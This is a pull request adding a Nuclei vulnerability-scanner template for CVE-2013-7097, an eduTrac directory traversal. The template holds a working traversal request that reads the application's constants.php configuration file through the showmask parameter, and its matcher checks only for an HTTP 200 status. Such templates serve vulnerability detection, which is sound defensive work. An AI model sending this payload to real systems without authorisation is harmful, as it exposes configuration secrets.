### PR TITLE
Create CVE-2013-7097.yaml

### DIFF
--- a/http/cves/2013/CVE-2013-7097.yaml
+++ b/http/cves/2013/CVE-2013-7097.yaml
@@ -1,6 +1,7 @@
 id: CVE-2013-7097
+
 info:
-  name: 7 Media Web Solutions eduTrac before v1.1.2 - Directory traversal
+  name: eduTrac - 'showmask' Directory Traversal
   author: ctflearner
   severity: medium
   description: >
@@ -10,7 +11,6 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2013-7097
     - https://www.exploit-db.com/exploits/38873
-    
   classification:
     cvss-metrics: (AV:N/AC:L/Au:N/C:P/I:N/A:N)
     cvss-score: 5.0
@@ -20,14 +20,15 @@ info:
   metadata:
     verified: true
     max-request: 1
-  tags: eduTrac,cve,cve2013,Directory traversal
+  tags: eduTrac,cve,cve2013,lfi
+
 http:
   - method: GET
     path:
       - "{{BaseURL}}/installer/overview.php?step=writeconfig&showmask=../../eduTrac/Config/constants.php"
+
     matchers-condition: and
     matchers:
-      
       - type: status
         status:
           - 200

--- a/http/cves/2013/CVE-2013-7097.yaml
+++ b/http/cves/2013/CVE-2013-7097.yaml
@@ -1,0 +1,33 @@
+id: CVE-2013-7097
+info:
+  name: 7 Media Web Solutions eduTrac before v1.1.2 - Directory traversal
+  author: ctflearner
+  severity: medium
+  description: >
+    Directory traversal vulnerability in 7 Media Web Solutions eduTrac before 1.1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the showmask parameter to installer/overview.php.
+  remediation: |
+    Upgrade to the latest version to mitigate this vulnerability.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2013-7097
+    - https://www.exploit-db.com/exploits/38873
+    
+  classification:
+    cvss-metrics: (AV:N/AC:L/Au:N/C:P/I:N/A:N)
+    cvss-score: 5.0
+    cve-id: CVE-2013-7097
+    cwe-id: CWE-22
+    cpe: cpe:2.3:a:7mediaws:edutrac:1.0.0:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+  tags: eduTrac,cve,cve2013,Directory traversal
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/installer/overview.php?step=writeconfig&showmask=../../eduTrac/Config/constants.php"
+    matchers-condition: and
+    matchers:
+      
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
Added a New Nuclei Template CVE-2013-7097

### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
This Template will Check for Directory traversal vulnerability in 7 Media Web Solutions eduTrac before 1.1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the showmask parameter to installer/overview.php.
<!-- Please include any reference to your template if available -->

-  Added CVE-2013-7097
- References:
    - https://nvd.nist.gov/vuln/detail/CVE-2013-7097
    - https://www.exploit-db.com/exploits/38873

### Template Validation

I've validated this template locally?
- [ ] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)